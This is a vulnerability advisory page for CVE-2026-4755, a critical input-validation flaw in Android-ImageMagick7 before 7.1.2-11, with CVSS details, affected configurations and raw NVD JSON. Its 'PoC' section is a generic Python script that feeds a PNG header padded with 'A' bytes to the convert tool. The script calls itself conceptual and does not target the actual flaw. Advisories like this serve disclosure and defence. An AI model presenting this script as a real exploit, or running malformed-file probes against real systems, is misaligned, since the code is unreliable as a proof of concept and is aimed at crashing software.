Security Vulnerability Report
中文
CVE-2026-4755 CVSS 9.8 CRITICAL

CVE-2026-4755

Published: 2026-03-24 07:16:08
Last Modified: 2026-03-26 19:00:59

Description

CWE-20 vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-11.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:* - VULNERABLE
Android-ImageMagick7 < 7.1.2-11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-4755 # This script demonstrates how a malformed image might trigger the vulnerability. # Note: This is a conceptual example based on CWE-20. import subprocess # Create a malformed image file (simulated) # In a real scenario, this would contain specific bytes to bypass validation malicious_file = "exploit.png" with open(malicious_file, "wb") as f: # Header bytes + payload to trigger validation error # Example: Oversized chunk or malformed header f.write(b'\x89PNG\r\n\x1a\n' + b'A' * 10000) # Command to convert the image using the vulnerable library # If the library is vulnerable (before 7.1.2-11), this may crash or execute code try: result = subprocess.check_output( ['convert', malicious_file, 'output.jpg'], stderr=subprocess.STDOUT, timeout=5 ) print("Conversion successful (Vulnerability might not be triggered)") except subprocess.CalledProcessError as e: print(f"Crash detected! Vulnerability likely triggered: {e.output}") except Exception as e: print(f"An error occurred: {str(e)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4755", "sourceIdentifier": "[email protected]", "published": "2026-03-24T07:16:07.500", "lastModified": "2026-03-26T19:00:59.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-20 vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-11."}, {"lang": "es", "value": "Vulnerabilidad CWE-20 en MolotovCherry Android-ImageMagick7. Este problema afecta a Android-ImageMagick7: anterior a 7.1.2-11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-11", "matchCriteriaId": "CD4FC35B-5E60-42CC-87A5-71FF393A6EAB"}]}]}], "references": [{"url": "https://github.com/MolotovCherry/Android-ImageMagick7/pull/193", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}